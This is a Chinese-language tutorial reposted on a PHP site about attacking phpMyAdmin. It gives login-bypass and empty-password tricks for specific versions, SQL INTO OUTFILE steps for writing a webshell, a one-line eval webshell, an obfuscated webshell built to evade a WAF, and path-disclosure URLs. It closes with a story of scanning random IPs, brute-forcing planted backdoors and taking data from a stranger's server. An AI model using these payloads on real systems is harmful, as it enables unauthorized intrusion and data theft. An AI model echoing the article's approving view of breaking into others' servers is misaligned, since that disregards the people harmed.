首頁  >  文章  >  資料庫  >  分析PHPmyadmin漏洞以及拿shell的介紹

分析PHPmyadmin漏洞以及拿shell的介紹

藏色散人
藏色散人轉載
2021-02-10 15:13:213867瀏覽

下面由phpmyadmin教學欄位介紹關於PHPmyadmin漏洞和拿shell,希望對需要的朋友有幫助!

分析PHPmyadmin漏洞以及拿shell的介紹

phpmyadmin的漏洞相對來說,還是比較多的,對於新手來說,分享幾個漏洞,深入的處於程式碼審計方面的也可以和我討論
phpmyadmin2.11.3-2.11.4 這兩個版本存在萬能密碼,直接使用'localhost'@'@」為帳號,密碼不用輸入。

phpmyadmin2.11.9.2 這個版本存在空口令。直接root使用者登陸,密碼不用

##找這個的話用自己的寫的腳本,或是搜素引擎什麼的,這裡懂的人就懂了,不懂也不在這裡。

#關於拿shell,----》root權限,並且有寫檔權限----》導出的目錄有寫權限----》有的情況下,就算你這兩個都有,但是伺服器的一些配置還是會對這個有影響。

在getshell之前先進入一個資料庫

第一種,使用sql語句,建立一個表,新增一個字段,字段的內容為一句話,然後匯出到php檔案中,最後刪除這個表,這個是最保險的方法 Create TABLE 表(列text NOT NULL)
Insert INTO 表(列) VALUES('2c94e138b1ef09d65f1021cf56efe9cb')
select 列from 表into _utfile '路徑'
Drop TABLE IF EXISTS 表;

第二種方法,這個是直接寫入 select '一句話'INTO _UTFILE '路徑'
還有幾種方法,大致原理都一樣。
然後,一般的話,一句話都是

<span style="font-size: 16px;"><?php @eval($_POST[x])?><br/></span>

有狗的話,用免殺一句話,下面這個是我過年前構造的過狗一句話,現在應該還可以過

<span style="font-size: 16px;"><?php<br/> $a = &#39;s&#39;;<br/> $str = str_repeat($a,2);<br/> $to = $_POST;<br/> //echo $str;<br/> $exp = &#39;a&#39;.$str[0].$str[1].&#39;e&#39;.&#39;r&#39;.&#39;t&#39;;<br/> $exp($to[&#39;x&#39;])<br/> ?><br/></span>

找路徑的話,

<span style="font-size: 16px;">1// 利用phpinfo.php<br/> 2//利用phpmyadmin的一些文件报错,下面都是网上通用的<br/> /phpMyAdmin/index.php?lang[]=1<br/> /phpMyAdmin/phpinfo.php<br/> /load_file()<br/> /phpmyadmin/themes/darkblue_orange/layout.inc.php<br/> /phpmyadmin/libraries/select_lang.lib.php<br/> /phpmyadmin/libraries/lect_lang.lib.php<br/> /phpmyadmin/libraries/mcrypt.lib.php<br/> /phpmyadmin/libraries/export/xls.php<br/></span>

3//再者就是利用網站包路徑,這些會的都會了,不會的慢慢的就會了。

下面開始實戰,腳本掃到一個IP,顯示存在phpmyadmin,開啟


##一看這些php檔案就是後門一句話,放到幾萬字典爆破,兩秒鐘



直接菜刀連結。 。 。 。 。

這個肯定被人搞了,直接打包好東西,你懂的。 。 。提權什麼的就不必要了。


以上是分析PHPmyadmin漏洞以及拿shell的介紹的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述:
本文轉載於:csdn.net。如有侵權,請聯絡admin@php.cn刪除